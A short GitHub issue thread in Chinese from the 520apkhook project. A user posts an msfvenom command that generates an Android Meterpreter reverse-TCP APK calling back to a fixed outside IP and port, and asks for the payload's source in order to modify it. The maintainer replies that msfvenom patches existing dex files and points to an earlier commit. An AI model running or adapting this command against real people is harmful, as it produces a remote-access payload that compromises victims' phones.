### ISSUE TITLE
请教一个问题

### ISSUE THREAD

**Issue by jl785917397** [cleverbao/520apkhook#34]
使用：msfvenom -p android/meterpreter/reverse_tcp lhost=114.114.114.114 lport=3306 -o ~/Downloads/msf.apk生成一个APK，我想知道有没有这个APK对应的源码，我想尝试在这个源码上做一些修改

**Comment by ba0gu0** [comment]
msf的apk文件暂时没找到源码，msfvenom的也是基于原有的dex文件进行修改的。

[https://github.com/ba0gu0/520apkhook/tree/c5f0107e383e994c4ead5a6f65dd962d489c256c](https://github.com/ba0gu0/520apkhook/tree/c5f0107e383e994c4ead5a6f65dd962d489c256c
)
参考下这个commit，之前python版本的就是分析了msf的源码，使用pytohn重新实现了dex文件修改相关信息。
